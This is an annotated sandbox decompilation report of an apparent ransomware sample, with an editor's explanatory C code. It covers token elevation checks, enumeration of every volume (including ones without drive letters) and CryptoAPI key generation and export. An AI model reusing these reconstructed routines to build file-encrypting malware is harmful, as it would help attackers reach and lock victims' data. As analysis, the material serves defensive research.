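The token query in E00E70AE0, as an added example by this editor; it is not code from the sample or from the Joe Sandbox report. It makes the class confusion concrete: class 0x14 with a 4-byte buffer is TokenElevation (TOKEN_ELEVATION.TokenIsElevated), while TokenIntegrityLevel (0x19) returns a TOKEN_MANDATORY_LABEL whose SID carries the integrity RID. Both decoders are plain C and run on any platform against the constructed buffers near the bottom (ELEVATION_ON, SID_HIGH_INTEGRITY and the others are made up for the example, not captured from the sample); the live query against the current process token is compiled only on Windows and uses the same OpenProcessToken(TOKEN_QUERY)/GetTokenInformation sequence as the decompiled routine.

```c
/* Added example by the editor, not code from the sample or from Joe Sandbox. It makes the
 * decompiled E00E70AE0 concrete: the sample asks for token class 0x14 with a 4-byte buffer,
 * which is TokenElevation (TOKEN_ELEVATION.TokenIsElevated), not TokenIntegrityLevel (0x19,
 * a TOKEN_MANDATORY_LABEL whose SID carries the integrity RID). The decoders are plain C so
 * they build and run anywhere; the live token query is compiled only under _WIN32. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Decode a TOKEN_ELEVATION buffer. 1 = elevated, 0 = not, -1 = wrong size (a 4-byte buffer
 * asked for TokenIntegrityLevel would never get here: the kernel fails the call with
 * ERROR_INSUFFICIENT_BUFFER instead). */
int decode_token_elevation(const uint8_t *buf, size_t len) {
    uint32_t is_elevated;
    if (len != sizeof is_elevated) return -1;
    memcpy(&is_elevated, buf, sizeof is_elevated);  /* DWORD TokenIsElevated, little-endian */
    return is_elevated != 0;
}

/* Pull the integrity RID out of a raw SID as returned for TokenIntegrityLevel.
 * SID layout: Revision(1) SubAuthorityCount(1) IdentifierAuthority(6, big-endian)
 * SubAuthority[count] (little-endian DWORDs). Mandatory-label SIDs are S-1-16-<RID>:
 * 0x1000 low, 0x2000 medium, 0x3000 high, 0x4000 system. Returns 0 for any other SID. */
uint32_t integrity_rid_from_sid(const uint8_t *sid, size_t len) {
    static const uint8_t mandatory_label_authority[6] = {0, 0, 0, 0, 0, 16};
    size_t count;
    const uint8_t *last;
    if (len < 8 || sid[0] != 1) return 0;                 /* SID revision is always 1 */
    count = sid[1];
    if (count == 0 || count > 15 || len < 8 + 4 * count) return 0;
    if (memcmp(sid + 2, mandatory_label_authority, 6) != 0) return 0;
    last = sid + 8 + 4 * (count - 1);
    return (uint32_t)last[0] | (uint32_t)last[1] << 8 | (uint32_t)last[2] << 16 | (uint32_t)last[3] << 24;
}

/* Constructed buffers (not captured from the sample) for the self-check in main(). */
const uint8_t ELEVATION_ON[4]          = {1, 0, 0, 0};
const uint8_t ELEVATION_OFF[4]         = {0, 0, 0, 0};
const uint8_t SID_HIGH_INTEGRITY[12]   = {1, 1, 0, 0, 0, 0, 0, 16, 0x00, 0x30, 0, 0}; /* S-1-16-12288 */
const uint8_t SID_MEDIUM_INTEGRITY[12] = {1, 1, 0, 0, 0, 0, 0, 16, 0x00, 0x20, 0, 0}; /* S-1-16-8192 */
const uint8_t SID_LOCAL_SYSTEM[12]     = {1, 1, 0, 0, 0, 0, 0, 5, 18, 0, 0, 0};        /* S-1-5-18 */

#ifdef _WIN32
#include <windows.h>
/* The sample's call sequence (OpenProcessToken(TOKEN_QUERY), GetTokenInformation(TokenElevation)
 * into 4 bytes) plus the TokenIntegrityLevel query the sandbox label suggested, against the live
 * process token. Returns 1 on success. */
int query_live_token(int *elevated, uint32_t *integrity_rid) {
    union { TOKEN_MANDATORY_LABEL tml; uint8_t raw[64]; } label;  /* label + S-1-16-x SID fits */
    uint8_t elev[4];
    HANDLE tok = NULL;
    DWORD need = 0;
    int ok = 0;
    if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &tok)) return 0;
    if (GetTokenInformation(tok, TokenElevation, elev, sizeof elev, &need) &&
        GetTokenInformation(tok, TokenIntegrityLevel, &label, sizeof label, &need)) {
        *elevated = decode_token_elevation(elev, sizeof elev);
        *integrity_rid = integrity_rid_from_sid((const uint8_t *)label.tml.Label.Sid,
                                                GetLengthSid(label.tml.Label.Sid));
        ok = 1;
    }
    CloseHandle(tok);
    return ok;
}
#endif

int main(void) {
    printf("constructed TOKEN_ELEVATION on/off: %d / %d\n",
           decode_token_elevation(ELEVATION_ON, sizeof ELEVATION_ON),
           decode_token_elevation(ELEVATION_OFF, sizeof ELEVATION_OFF));
    printf("constructed S-1-16-12288 RID: 0x%x\n",
           (unsigned)integrity_rid_from_sid(SID_HIGH_INTEGRITY, sizeof SID_HIGH_INTEGRITY));
#ifdef _WIN32
    {
        int elevated = -1;
        uint32_t rid = 0;
        if (query_live_token(&elevated, &rid))
            printf("this process: elevated=%d integrity RID=0x%x\n", elevated, (unsigned)rid);
    }
#endif
    return 0;
}
```

On a Windows host run it once from a normal prompt and once from an elevated one: TokenIsElevated goes from 0 to 1 and the RID from 0x2000 to 0x3000, which is exactly the pair of facts a UAC-aware sample branches on before deciding whether to attempt an elevation bypass.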

                                      C-Code - Quality: 25%
                                      			// Editor's note (not decompiler output): MSVC UCRT try_cor_exit_process. If mscoree.dll is
                                      			// already loaded (GetModuleHandleExW with flags 0 also bumps its reference count), call
                                      			// CorExitProcess(_a4) so a CLR-hosting process shuts down cleanly, then FreeLibrary drops the
                                      			// reference. The call through 0xec4320 right before the indirect call is consistent with the
                                      			// Control Flow Guard check (__guard_check_icall_fptr), which the decompiler renders as a call
                                      			// taking the real arguments. CRT code, not ransomware logic. Trailing "@0x..." markers are
                                      			// the report's per-statement addresses.
                                      			E00EA57EA(void* __ecx, intOrPtr _a4) {
                                      				signed int _v8;
                                      				_Unknown_base(*)()* _t8;
                                      				_Unknown_base(*)()* _t14;
                                      
                                      				_v8 = _v8 & 0x00000000; // @0x00ea57f0
                                      				_t8 =  &_v8; // @0x00ea57f4
                                      				__imp__GetModuleHandleExW(0, L"mscoree.dll", _t8, __ecx); // @0x00ea57ff
                                      				if(_t8 != 0) { // @0x00ea5807
                                      					_t8 = GetProcAddress(_v8, "CorExitProcess"); // @0x00ea5812
                                      					_t14 = _t8; // @0x00ea5818
                                      					if(_t14 != 0) { // @0x00ea581c
                                      						 *0xec4320(_a4); // @0x00ea5823
                                      						_t8 =  *_t14(); // @0x00ea5829
                                      					} // @0x00ea5829
                                      				} // @0x00ea582b
                                      				if(_v8 != 0) { // @0x00ea5830
                                      					return FreeLibrary(_v8);
                                      				} // @0x00ea5835
                                      				return _t8; // @0x00ea583c
                                      			}

                                      APIs
                                      • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,00EA57DF,?,?,00EA57A7,00E62ABC,?,?), ref: 00EA57FF
                                      • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00EA5812
                                      • FreeLibrary.KERNEL32(00000000,?,?,00EA57DF,?,?,00EA57A7,00E62ABC,?,?), ref: 00EA5835
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AddressFreeHandleLibraryModuleProc
                                      • String ID: CorExitProcess$mscoree.dll
                                      • API String ID: 4061214504-1276376045
                                      • Opcode ID: 3c450834625b33a0a1c8fa24cf83ea4fd8bd5709c62373f6ae085804986c7dac
                                      • Instruction ID: 79b9e750df09aa3a8633c2bfa4a20e20f21fd46a231fda2f97105d5bebadd4b2
                                      • Opcode Fuzzy Hash: 3c450834625b33a0a1c8fa24cf83ea4fd8bd5709c62373f6ae085804986c7dac
                                      • Instruction Fuzzy Hash: D0F0E272501208FBCB15AB62EC1AF9D7E78EB09726F000030B400B61B0CB758E05DB80
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 50%
                                      			// Editor's note (not decompiler output): MSVC UCRT thunk for SleepConditionVariableCS
                                      			// (_a4 is the timeout). If the pointer at 0xef2e5c (the resolved SleepConditionVariableCS,
                                      			// see the API list) is set it is called through the CFG check at 0xec4320 with the condition
                                      			// variable 0xef2e3c and critical section 0xef2e44; on Windows versions without the API the
                                      			// fallback leaves the critical section, waits on the handle at 0xef2e40 and re-enters it.
                                      			// CRT code, not ransomware logic. Trailing "@0x..." markers are the report's addresses.
                                      			E00E89BDD(long _a4) {
                                      				long _t3;
                                      				intOrPtr* _t7;
                                      
                                      				_t7 =  *0xef2e5c; // @0x00e89be1
                                      				if(_t7 == 0) { // @0x00e89be9
                                      					LeaveCriticalSection(0xef2e44); // @0x00e89c0a
                                      					_t3 = WaitForSingleObjectEx( *0xef2e40, _a4, 0); // @0x00e89c1b
                                      					EnterCriticalSection(0xef2e44); // @0x00e89c22
                                      					return _t3;
                                      				} // @0x00e89c22
                                      				 *0xec4320(0xef2e3c, 0xef2e44, _a4); // @0x00e89bfa
                                      				return  *_t7();
                                      			}

                                      APIs
                                      • SleepConditionVariableCS.KERNELBASE(?,00E89B7A,00000064), ref: 00E89C00
                                      • LeaveCriticalSection.KERNEL32(00EF2E44,?,?,00E89B7A,00000064,?,?,?,00E52823,00EF3AB8), ref: 00E89C0A
                                      • WaitForSingleObjectEx.KERNEL32(?,00000000,?,00E89B7A,00000064,?,?,?,00E52823,00EF3AB8), ref: 00E89C1B
                                      • EnterCriticalSection.KERNEL32(00EF2E44,?,00E89B7A,00000064,?,?,?,00E52823,00EF3AB8), ref: 00E89C22
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CriticalSection$ConditionEnterLeaveObjectSingleSleepVariableWait
                                      • String ID: D.
                                      • API String ID: 3269011525-1603222338
                                      • Opcode ID: bd7d122046d0e6a8380c16936e92312699be3e68efef08a5dcbdff9ef3102e48
                                      • Instruction ID: 7e98d636c37cdb3dfef19eac9fbdc4f68191707afcfa4e6a2026947cc67727a2
                                      • Opcode Fuzzy Hash: bd7d122046d0e6a8380c16936e92312699be3e68efef08a5dcbdff9ef3102e48
                                      • Instruction Fuzzy Hash: 61E09B36A42228BFCB032B52EC15DAE7F38AB45711B155064F74972170C7620C0587C0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 81%
                                      			// Editor's note (not decompiler output): enumerates every volume, mounted or not, and
                                      			// resolves it to its \Device\... name. Loop on FindFirstVolumeW/FindNextVolumeW over a
                                      			// 0x104-wchar_t stack buffer (E00EA1270 is memset; the inner do/while is an inlined wcslen).
                                      			// The name must look like \\?\Volume{GUID}\ (the "\\?\" prefix and a trailing backslash,
                                      			// the same test as Microsoft's "Displaying Volume Paths" sample): the trailing backslash is
                                      			// replaced by 0, "Volume{GUID}" is passed to QueryDosDeviceW, the backslash is restored and
                                      			// the (device, volume) pair goes into the container returned through _a4. A name that fails
                                      			// the test ends the whole loop. The 0x208 range check with E00E89FFE (in the role of
                                      			// __report_rangecheckfailure) and the lfence are compiler-inserted (/sdl, /Qspectre); the
                                      			// 0xbad995 offsets are a decompiler artifact standing for _v540[1], [2], [3] and &_v540[4];
                                      			// the ">= 0" test on the QueryDosDeviceW result is, as rendered, always true.
                                      			E00E6C2A0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4) {
                                      				char _v16;
                                      				signed int _v20;
                                      				char _v540;
                                      				short _v1060;
                                      				char _v1064;
                                      				char _v1076;
                                      				char _v1100;
                                      				char _v1124;
                                      				char _v1148;
                                      				intOrPtr* _v1152;
                                      				short _v1154;
                                      				signed int _v1160;
                                      				intOrPtr _v1164;
                                      				signed int _v1168;
                                      				intOrPtr _v1172;
                                      				intOrPtr _v1176;
                                      				signed int _v1180;
                                      				long _v1184;
                                      				char _v1208;
                                      				signed int _t77;
                                      				signed int _t78;
                                      				intOrPtr _t84;
                                      				intOrPtr _t104;
                                      				void* _t113;
                                      				void* _t116;
                                      				void* _t168;
                                      				signed int _t169;
                                      				void* _t170;
                                      				void* _t172;
                                      
                                      				_t168 = __esi;
                                      				_t167 = __edi;
                                      				_t116 = __ebx;
                                      				_t77 =  *0xeef074; // 0x221cac15
                                      				_t78 = _t77 ^ _t169;
                                      				_v20 = _t78;
                                      				 *[fs:0x0] =  &_v16;
                                      				_v1172 = __ecx;
                                      				E00E53840( &_v1064, _v1172);
                                      				E00E515C0( &_v1076, 0xc);
                                      				E00E566A0( &_v1076);
                                      				_t84 = E00EA1270(__edi,  &_v540, 0, 0x208);
                                      				_t172 = _t170 - 0x4a8 + 0xc;
                                      				__imp__FindFirstVolumeW( &_v540, 0x104, _t78,  *[fs:0x0], 0xec1730, 0xffffffff);
                                      				_v1164 = _t84;
                                      				if(_v1164 != 0xffffffff) {
                                      					do {
                                      						_v1152 =  &_v540;
                                      						_v1176 = _v1152 + 2;
                                      						do {
                                      							_v1154 =  *_v1152;
                                      							_v1152 = _v1152 + 2;
                                      						} while (_v1154 != 0);
                                      						_v1180 = _v1152 - _v1176 >> 1;
                                      						_v1160 = _v1180 - 1;
                                      						if(( *(_t169 + 0xfffffffffffffde8) & 0x0000ffff) == 0x5c && ( *(_t169 + 0xbad995) & 0x0000ffff) == 0x5c && ( *(_t169 + 0xbad995) & 0x0000ffff) == 0x3f && ( *(_t169 + 0xfffffffffffffdee) & 0x0000ffff) == 0x5c && ( *(_t169 + _v1160 * 2 - 0x218) & 0x0000ffff) == 0x5c) {
                                      							goto L9;
                                      						}
                                      						break;
                                      						L9:
                                      						_v1168 = _v1160 << 1;
                                      						__eflags = _v1168 - 0x208;
                                      						if(_v1168 >= 0x208) {
                                      							E00E89FFE();
                                      						}
                                      						asm("lfence");
                                      						 *((short*)(_t169 + _v1168 - 0x218)) = 0;
                                      						E00EA1270(_t167,  &_v1060, 0, 0x208);
                                      						_t172 = _t172 + 0xc;
                                      						_v1184 = QueryDosDeviceW(_t169 + 0xbad995,  &_v1060, 0x104);
                                      						 *(_t169 + _v1160 * 2 - 0x218) = 0x5c;
                                      						__eflags = _v1184;
                                      						if(_v1184 >= 0) {
                                      							E00E6C740( &_v1148);
                                      							E00E6CB40( &_v1148,  &_v1060);
                                      							E00E6CB40( &_v1124,  &_v540);
                                      							E00E57B60( &_v1100, E00E6C590(_t116,  &_v1064, _t167, _t168, __eflags,  &_v1208,  &_v540));
                                      							E00E57B40( &_v1208);
                                      							_t113 = E00E51650( &_v1148);
                                      							_t172 = _t172 + 4;
                                      							E00E6C660( &_v1076, _t113);
                                      							E00E6C270( &_v1148);
                                      						}
                                      						_t104 = _v1164;
                                      						__imp__FindNextVolumeW(_t104,  &_v540, 0x104);
                                      						__eflags = _t104;
                                      					} while (_t104 != 0);
                                      					__imp__FindVolumeClose(_v1164);
                                      				}
                                      				E00E57460(_a4, E00E51650( &_v1076));
                                      				E00E6CAA0( &_v1076);
                                      				 *[fs:0x0] = _v16;
                                      				return E00E89A35(_t116, _v20 ^ _t169,  &_v1076, _t167, _t168);
                                      			}
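The volume loop of E00E6C2A0, restated as an added example by this editor; it is not code from the sample or from Joe Sandbox. volume_guid_path_end is the sample's shape test with one extra guard (at least one character between the \\?\ prefix and the trailing backslash), volume_guid_to_dos_name does the temporary overwrite that turns \\?\Volume{GUID}\ into the Volume{GUID} string QueryDosDeviceW wants, and example_roundtrip shows the restore that lets one stack buffer be reused across iterations. Those parts are plain C and run anywhere; enumerate_volumes_like_sample is the Windows-only loop and is compiled only under _WIN32. EXAMPLE_VOLUME is a made-up GUID, not one from the report.

```c
/* Added example by the editor, not code from the sample or from Joe Sandbox. It restates the
 * volume-name handling of the decompiled E00E6C2A0 in readable C: the \\?\Volume{GUID}\ shape
 * check, the temporary removal of the trailing backslash so "Volume{GUID}" can be handed to
 * QueryDosDeviceW, and the restore afterwards. The shape check and the slice are plain C and
 * run anywhere; the enumeration loop is Windows-only and is compiled only under _WIN32. */
#include <stddef.h>
#include <stdio.h>
#include <wchar.h>

#define VOLUME_NAME_CHARS 0x104  /* the 0x208-byte buffer the sample zeroes = 0x104 wchar_t */

/* The sample's five-character test. Returns the index of the trailing backslash (the one the
 * sample overwrites with L'\0' before QueryDosDeviceW) or 0 when the name does not look like
 * \\?\Volume{...}\ ; the sample leaves its enumeration loop on that 0. One guard the sample
 * lacks is added here: at least one character between the prefix and the trailing backslash. */
size_t volume_guid_path_end(const wchar_t *name) {
    size_t len = wcslen(name);
    if (len < 6 || len >= VOLUME_NAME_CHARS) return 0;
    if (name[0] != L'\\' || name[1] != L'\\' || name[2] != L'?' || name[3] != L'\\') return 0;
    if (name[len - 1] != L'\\') return 0;
    return len - 1;
}

/* In place: "\\?\Volume{X}\" becomes "\\?\Volume{X}" and the returned pointer (name + 4) is the
 * "Volume{X}" string QueryDosDeviceW expects. *saved_end tells the caller which character to
 * put back. NULL when the shape check fails. */
wchar_t *volume_guid_to_dos_name(wchar_t *name, size_t *saved_end) {
    size_t end = volume_guid_path_end(name);
    if (end == 0) return NULL;
    name[end] = L'\0';
    *saved_end = end;
    return name + 4;
}

/* Constructed volume name (not taken from the report). */
static const wchar_t EXAMPLE_VOLUME[] = L"\\\\?\\Volume{3f1c2b9e-9a6a-4b0e-8d2c-0123456789ab}\\";

/* Slice, check what QueryDosDeviceW would receive, restore. Returns 1 when the buffer is back
 * to the original afterwards, which is what lets the sample reuse its one stack buffer. */
int example_roundtrip(void) {
    wchar_t copy[VOLUME_NAME_CHARS];
    size_t end = 0;
    wchar_t *dos;
    wcscpy(copy, EXAMPLE_VOLUME);
    dos = volume_guid_to_dos_name(copy, &end);
    if (dos == NULL || wcscmp(dos, L"Volume{3f1c2b9e-9a6a-4b0e-8d2c-0123456789ab}") != 0) return 0;
    copy[end] = L'\\';
    return wcscmp(copy, EXAMPLE_VOLUME) == 0;
}

#ifdef _WIN32
#include <windows.h>
/* The sample's loop: FindFirstVolumeW/FindNextVolumeW over every volume, drive letter or not,
 * resolving each to its \Device\... name. Prints "device <- volume" and returns the number
 * resolved, or -1 if a name failed the shape check (where the sample stops enumerating). */
int enumerate_volumes_like_sample(void) {
    wchar_t volume[VOLUME_NAME_CHARS];
    wchar_t device[VOLUME_NAME_CHARS];
    HANDLE h = FindFirstVolumeW(volume, VOLUME_NAME_CHARS);
    int n = 0;
    if (h == INVALID_HANDLE_VALUE) return 0;
    do {
        size_t end = 0;
        wchar_t *dos = volume_guid_to_dos_name(volume, &end);
        DWORD got;
        if (dos == NULL) { n = -1; break; }
        got = QueryDosDeviceW(dos, device, VOLUME_NAME_CHARS);
        volume[end] = L'\\';             /* restore before the buffer is reused */
        if (got != 0) { printf("%ls <- %ls\n", device, volume); n++; }
    } while (FindNextVolumeW(h, volume, VOLUME_NAME_CHARS));
    FindVolumeClose(h);
    return n;
}
#endif

int main(void) {
    printf("roundtrip on constructed name: %d\n", example_roundtrip());
#ifdef _WIN32
    printf("volumes resolved: %d\n", enumerate_volumes_like_sample());
#endif
    return 0;
}
```

Run on a Windows VM it also lists volumes that have no drive letter (recovery partitions, volumes mounted into folders), which is why enumerating by volume GUID reaches more data than walking drive letters; the -1 return mirrors the sample's choice to abandon enumeration on the first name that fails the test rather than skip it.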
                                      (Address column of the decompiler listing, 0x00e6c2a0 to 0x00e6c583, detached from its source lines by extraction)

                                      APIs
                                      • FindFirstVolumeW.KERNEL32(?,00000104,0000000C,?,221CAC15), ref: 00E6C31D
                                      • QueryDosDeviceW.KERNEL32(?,?,00000104), ref: 00E6C466
                                      • task.LIBCPMTD ref: 00E6C4EC
                                      • FindNextVolumeW.KERNEL32(000000FF,?,00000104), ref: 00E6C52A
                                      • FindVolumeClose.KERNEL32(000000FF), ref: 00E6C53F
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FindVolume$CloseDeviceFirstNextQuerytask
                                      • String ID:
                                      • API String ID: 782275671-0
                                      • Opcode ID: e546f28bb4f2b64f7d50223023474dc22f0ab9d58c6fa6ed6d5ce996eefd01dc
                                      • Instruction ID: 7217beb6b70ebba57b9007eb388aeb6ee7aaaf275c016ccd47db5e1180fc6c7f
                                      • Opcode Fuzzy Hash: e546f28bb4f2b64f7d50223023474dc22f0ab9d58c6fa6ed6d5ce996eefd01dc
                                      • Instruction Fuzzy Hash: DB71A1B09401288ACB24DF24DC95BEDB3B4AB58304F5056E9E65EB6291EF305E89CF58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 83%
                                      			E00E65E90(void* __ebx, signed int __ecx, void* __edi, void* __esi) {
                                      				char _v16;
                                      				signed int _v20;
                                      				char _v44;
                                      				char _v68;
                                      				signed int _v72;
                                      				char _v73;
                                      				signed int _v80;
                                      				intOrPtr _v84;
                                      				intOrPtr _v88;
                                      				intOrPtr _v92;
                                      				char _v116;
                                      				signed int _t62;
                                      				signed int _t63;
                                      				void* _t76;
                                      				signed char _t77;
                                      				void* _t81;
                                      				signed char _t82;
                                      				signed char _t95;
                                      				signed int _t147;
                                      
                                      				_t146 = __esi;
                                      				_t145 = __edi;
                                      				_t103 = __ebx;
                                      				_push(0xffffffff);
                                      				_push(0xec1030);
                                      				_push( *[fs:0x0]);
                                      				_t62 =  *0xeef074; // 0x221cac15
                                      				_t63 = _t62 ^ _t147;
                                      				_v20 = _t63;
                                      				_push(_t63);
                                      				 *[fs:0x0] =  &_v16;
                                      				_v72 = __ecx;
                                      				if((E00E66090(_v72, _v72 + 0x10) & 0x000000ff) == 0) {
                                      					L11:
                                      					__eflags = 0;
                                      				} else {
                                      					_v80 = E00E66150(_v72,  *(_v72 + 0x10));
                                      					_t139 = _v72;
                                      					_v84 = E00E660F0(_v72,  *(_v72 + 4), 1, _v80);
                                      					if(_v80 <= 0) {
                                      						goto L11;
                                      					} else {
                                      						_t157 = _v84;
                                      						if(_v84 <= 0) {
                                      							goto L11;
                                      						} else {
                                      							asm("lfence");
                                      							E00E66310(__ebx,  &_v68, __edi, __esi, _t157, _v84, 0);
                                      							_t76 = E00E51650( &_v68);
                                      							_t139 =  *(_v72 + 0x10);
                                      							_t77 = E00E66210(_v72, _t157,  *(_v72 + 0x10), _t76, _v80);
                                      							_t158 = _t77 & 0x000000ff;
                                      							if((_t77 & 0x000000ff) == 0) {
                                      								L10:
                                      								E00E57F50( &_v68);
                                      								goto L11;
                                      							} else {
                                      								asm("lfence");
                                      								_t81 = E00E51650( &_v68);
                                      								_t139 =  *(_v72 + 4);
                                      								_t82 = E00E661A0(_v72, _t158,  *(_v72 + 4), 1, _t81, _v80, _v84);
                                      								_t159 = _t82 & 0x000000ff;
                                      								if((_t82 & 0x000000ff) == 0) {
                                      									goto L10;
                                      								} else {
                                      									asm("lfence");
                                      									E00E61BB0(__ebx, 0xef3ac0, _t139, __edi, __esi, _t159,  &_v44, E00E51650(E00E62280(0xef3ac0)));
                                      									_v92 = E00E57A20( &_v44);
                                      									_t139 = _v80;
                                      									_v88 = E00E660F0(_v72,  *(_v72 + 4), 1, _v80);
                                      									if(_v92 <= 0) {
                                      										L9:
                                      										E00E57F50( &_v44);
                                      										goto L10;
                                      									} else {
                                      										_t161 = _v88;
                                      										if(_v88 <= 0) {
                                      											goto L9;
                                      										} else {
                                      											asm("lfence");
                                      											E00E66280(__ebx,  &_v44, __edi, __esi, _v88, 0);
                                      											_t95 = E00E661A0(_v72, _t161,  *(_v72 + 4), 1, E00E51650( &_v44), _v92, _v88);
                                      											_t139 = _t95 & 0x000000ff;
                                      											if((_t95 & 0x000000ff) == 0) {
                                      												goto L9;
                                      											} else {
                                      												asm("lfence");
                                      												_t139 =  &_v116;
                                      												E00E662D0(_v72 + 0x14, E00E666A0(__ebx, __edi,  &_v116,  &_v68,  &_v44));
                                      												E00E57F50( &_v116);
                                      												_v73 = 1;
                                      												E00E57F50( &_v44);
                                      												E00E57F50( &_v68);
                                      											}
                                      										}
                                      									}
                                      								}
                                      							}
                                      						}
                                      					}
                                      				}
                                      				 *[fs:0x0] = _v16;
                                      				return E00E89A35(_t103, _v20 ^ _t147, _t139, _t145, _t146);
                                      			}
                                      (Address column of the decompiler listing, 0x00e65e90 to 0x00e6608b, detached from its source lines by extraction)

                                      APIs
                                        • Part of subcall function 00E66090: CryptGenKey.ADVAPI32(?,00006610,00000001,?,?,221CAC15), ref: 00E660AB
                                        • Part of subcall function 00E66150: CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000,?), ref: 00E6617A
                                        • Part of subcall function 00E660F0: CryptEncrypt.ADVAPI32(?,00000000,?,00000000,00000000,?,00000000,?,?,221CAC15), ref: 00E6611E
                                        • Part of subcall function 00E66210: CryptExportKey.ADVAPI32(?,00000000,00000008,00000000,00000000,00000000,?,221CAC15,?,00000000,221CAC15), ref: 00E66251
                                      • task.LIBCPMTD ref: 00E6606C
                                        • Part of subcall function 00E661A0: CryptEncrypt.ADVAPI32(00000001,00000000,221CAC15,00000000,00000000,00000000,?,?,221CAC15,00000001,00000000,00000000,221CAC15), ref: 00E661E8
                                      • task.LIBCPMTD ref: 00E66064
                                        • Part of subcall function 00E666A0: task.LIBCPMTD ref: 00E66733
                                      • task.LIBCPMTD ref: 00E66043
                                      • task.LIBCPMTD ref: 00E6604F
                                      • task.LIBCPMTD ref: 00E66057
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.254558230.0000000000E51000.00000020.00000001.01000000.00000005.sdmp, Offset: 00E50000, based on PE: true
                                      • Associated: 00000001.00000002.254538082.0000000000E50000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EC4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255570295.0000000000EE4000.00000002.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255873372.0000000000EEF000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255886786.0000000000EF0000.00000008.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255901582.0000000000EF2000.00000004.00000001.01000000.00000005.sdmp
                                      • Associated: 00000001.00000002.255915853.0000000000EF4000.00000002.00000001.01000000.00000005.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_e50000_svhost.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: task$Crypt$EncryptExport
                                      • String ID:
                                      • API String ID: 2898288894-0
                                      • Opcode ID: dd577f89a737769834d684c2a92ae56f69c368b7ea352a61a4815385adb31f21
                                      • Instruction ID: bb5bd108f7650b12978686498d2e66382a7f4502705d9a3bd4b45e984df0718f
                                      • Opcode Fuzzy Hash: dd577f89a737769834d684c2a92ae56f69c368b7ea352a61a4815385adb31f21
                                      • Instruction Fuzzy Hash: C4514D71E501089FDB14EBE4D851EEEB7B9BF48344F145169E506BB282DA31AD06CBA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 91%
                                      			E00E54800(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr* _a4) {
                                      				intOrPtr _v8;
                                      				char _v16;
                                      				signed int _v20;
                                      				char _v28;
                                      				intOrPtr _v32;
                                      				intOrPtr* _v36;
                                      				intOrPtr* _v40;
                                      				intOrPtr _v44;
